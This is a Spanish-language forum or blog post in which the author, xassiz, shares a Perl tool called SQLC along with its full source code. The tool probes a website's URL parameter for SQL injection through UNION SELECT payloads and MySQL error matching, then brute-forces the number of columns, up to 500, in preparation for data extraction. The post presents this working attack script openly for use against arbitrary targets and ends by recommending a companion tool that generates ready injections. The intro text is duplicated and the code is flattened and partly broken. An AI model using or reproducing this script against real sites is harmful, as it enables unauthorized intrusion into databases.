SQLC (SQL Columnator) - by xassiz
SQLC es mi herramienta en Perl, capaz de devolverte el número de columnas de una web, luego de comprobar si realmente es vulnerable.
Un ejemplo de su uso:
Aquí teneis el código:
SQLC es mi herramienta en Perl, capaz de devolverte el número de columnas de una web, luego de comprobar si realmente es vulnerable.
Un ejemplo de su uso:
Aquí teneis el código:
Código
#!/usr/bin/perl use LWP::UserAgent; if (!$ARGV[0]) { .d8888. .d88b. db .o88b. 88' YP .8P Y8. 88 d8P Y8 `8bo. 88 88 88 8P `Y8b. 88 88 88 8b db 8D `8P d8' 88booo. Y8b d8 `8888Y' `Y88'Y8 Y88888P `Y88P' [+] Modo de uso: perl SQLC.pl http://www.target.com/news.php?id= ------------------------------- Coded by xassiz ); } .d8888. .d88b. db .o88b. 88' YP .8P Y8. 88 d8P Y8 `8bo. 88 88 88 8P `Y8b. 88 88 88 8b db 8D `8P d8' 88booo. Y8b d8 `8888Y' `Y88'Y8 Y88888P `Y88P' ); $target = $ARGV[0]; $comprobacion = $vulnerabilidad->get($target."-1+union+select+69--"); if ($comprobacion->content =~ /The used SELECT statements have a different number of columns/ || $comprobacion->content =~ /You have an error in your SQL syntax/ || $comprobacion->content =~ /mysql_fetch/ || $comprobacion->content =~ /mysql_num_rows/ || $comprobacion->content =~ /MySQL/) { $count = 2; $max = 500; $precolumns = $precolumnator->get($target."-1+union+select+0x78617373697a--"); if ($precolumns->content =~ /xassiz/) { } $inject = ",0x78617373697a"; while ($count <= $max) { $columns = $columnator->get($target."-1+union+select+0x78617373697a".$inject."--"); if ($columns->content =~ /xassiz/) { } $inject = $inject.",0x78617373697a"; $count ++; } } else { } #Autor = xassiz; #Blog = http://xassiz.blogspot.com;
Espero que os guste amigos! Saludos
PD: podeis complementarla con SQL Copy Column, que le indicas el numero de columnas y directamente te pone la inyección en el portapapeles